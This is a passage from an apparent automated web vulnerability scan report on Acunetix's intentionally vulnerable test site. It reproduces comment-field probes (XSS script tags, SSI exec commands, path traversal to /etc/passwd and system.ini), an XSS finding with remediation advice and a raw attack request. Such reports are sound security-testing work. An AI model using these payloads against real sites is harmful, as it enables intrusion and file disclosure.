          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:38 PM</DIV><DIV class="CommentText">\\3528756824722488419.owasp.org</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:38 PM</DIV><DIV class="CommentText">HtTp://3528756824722488419.owasp.org</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:38 PM</DIV><DIV class="CommentText">HtTpS://3528756824722488419.owasp.org</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:16 PM</DIV><DIV class="CommentText">0W45pz4p</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:16 PM</DIV><DIV class="CommentText"></div><scrIpt>alert(1);</scRipt><div></DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:03 PM</DIV><DIV class="CommentText">"><!--#EXEC cmd="dir \"--><</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:31 PM</DIV><DIV class="CommentText">c:/Windows/system.ini</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:32 PM</DIV><DIV class="CommentText">../../../../../../../../../../../../../../../../Windows/system.ini</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:32 PM</DIV><DIV class="CommentText">c:\Windows\system.ini</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:32 PM</DIV><DIV class="CommentText">..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\system.ini</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:32 PM</DIV><DIV class="CommentText">/etc/passwd</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:33 PM</DIV><DIV class="CommentText">../../../../../../../../../../../../../../../../etc/passwd</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:33 PM</DIV><DIV class="CommentText">c:/</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:33 PM</DIV><DIV class="CommentText">/</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:33 PM</DIV><DIV class="CommentText">c:\</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:34 PM</DIV><DIV class="CommentText">../../../../../../../../../../../../../../../../</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:34 PM</DIV><DIV class="CommentText">WEB-INF/web.xml</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:35 PM</DIV><DIV class="CommentText">WEB-INF\web.xml</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:35 PM</DIV><DIV class="CommentText">/WEB-INF/web.xml</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:35 PM</DIV><DIV class="CommentText">\WEB-INF\web.xml</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:35 PM</DIV><DIV class="CommentText">thishouldnotexistandhopefullyitwillnot</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:11 PM</DIV><DIV class="CommentText">http://www.google.com/</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:11 PM</DIV><DIV class="CommentText">http://www.google.com:80/</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:11 PM</DIV><DIV class="CommentText">http://www.google.com</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:12 PM</DIV><DIV class="CommentText">http://www.google.com/search?q=OWASP%20ZAP</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:12 PM</DIV><DIV class="CommentText">http://www.google.com:80/search?q=OWASP%20ZAP</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:12 PM</DIV><DIV class="CommentText">www.google.com/</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:12 PM</DIV><DIV class="CommentText">www.google.com:80/</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:12 PM</DIV><DIV class="CommentText">www.google.com</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:13 PM</DIV><DIV class="CommentText">www.google.com/search?q=OWASP%20ZAP</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:13 PM</DIV><DIV class="CommentText">www.google.com:80/search?q=OWASP%20ZAP</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:03 PM</DIV><DIV class="CommentText"><!--#EXEC cmd="ls /"--></DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:03 PM</DIV><DIV class="CommentText">"><!--#EXEC cmd="ls /"--><</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:03 PM</DIV><DIV class="CommentText"><!--#EXEC cmd="dir \"--></DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          </table>
          
          						</div>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA">&lt;/div&gt;&lt;scrIpt&gt;alert(1);&lt;/scRipt&gt;&lt;div&gt;</textarea>
          									<input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          					</TD>
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          tbComment
          Attack
          </div><scrIpt>alert(1);</scRipt><div>
          Evidence
          </div><scrIpt>alert(1);</scRipt><div>
          Solution

          フェーズ: アーキテクチャと設計

          同脆弱性を引き起こさせない、あるいは容易に回避可能な精査されたライブラリ、あるいはフレームワークを使用してください。

          Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.

          Phases: Implementation; Architecture and Design

          Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies.

          For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters.

          Consult the XSS Prevention Cheat Sheet for more details on the types of encoding and escaping that are needed.

          Phase: Architecture and Design

          For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.

          If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated.

          Phase: Implementation

          For every web page that is generated, use and specify a character encoding such as ISO-8859-1 or UTF-8. When an encoding is not specified, the web browser may choose a different encoding by guessing which encoding is actually being used by the web page. This can cause the web browser to treat certain sequences as special, opening up the client to subtle XSS attacks. See CWE-116 for more mitigations related to encoding/escaping.

          To help mitigate XSS attacks against the user's session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user's session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set.

          Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use an allow list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a deny list). However, deny lists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.

          When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if you are expecting colors such as "red" or "blue."

          Ensure that you perform input validation at well-defined interfaces within the application. This will help protect the application even if a component is reused or moved elsewhere.

        3. POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=javascript%3Aalert%281%29%3B&id=2
          Alert tags
          Alert description

          Cross-site Scripting (XSS) is an attack technique that involves echoing attacker-supplied code into a user's browser instance. A browser instance can be a standard web browser client, or a browser object embedded in a software product such as the browser within WinAmp, an RSS reader, or an email client. The code itself is usually written in HTML/JavaScript, but may also extend to VBScript, ActiveX, Java, Flash, or any other browser-supported technology.

          When an attacker gets a user's browser to execute his/her code, the code will run within the security context (or zone) of the hosting web site. With this level of privilege, the code has the ability to read, modify and transmit any sensitive data accessible by the browser. A Cross-site Scripted user could have his/her account hijacked (cookie theft), their browser redirected to another location, or possibly shown fraudulent content delivered by the web site they are visiting. Cross-site Scripting attacks essentially compromise the trust relationship between a user and the web site. Applications utilizing browser object instances which load content from the file system may execute code under the local machine zone allowing for system compromise.

          There are three types of Cross-site Scripting attacks: non-persistent, persistent and DOM-based.

          Non-persistent attacks and DOM-based attacks require a user to either visit a specially crafted link laced with malicious code, or visit a malicious web page containing a web form, which when posted to the vulnerable site, will mount the attack. Using a malicious form will oftentimes take place when the vulnerable resource only accepts HTTP POST requests. In such a case, the form can be submitted automatically, without the victim's knowledge (e.g. by using JavaScript). Upon clicking on the malicious link or submitting the malicious form, the XSS payload will get echoed back and will get interpreted by the user's browser and execute. Another technique to send almost arbitrary requests (GET and POST) is by using an embedded client, such as Adobe Flash.

          Persistent attacks occur when the malicious code is submitted to a web site where it's stored for a period of time. Examples of an attacker's favorite targets often include message board posts, web mail messages, and web chat software. The unsuspecting user is not required to interact with any additional site/link (e.g. an attacker site or a malicious link sent via email), just simply view the web page containing the code.

          Request
          Request line and header section (472 bytes)
          POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=javascript%3Aalert%281%29%3B&id=2 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=2
          Content-Length: 10989
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (10989 bytes)
          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc%2BQWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BNTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgI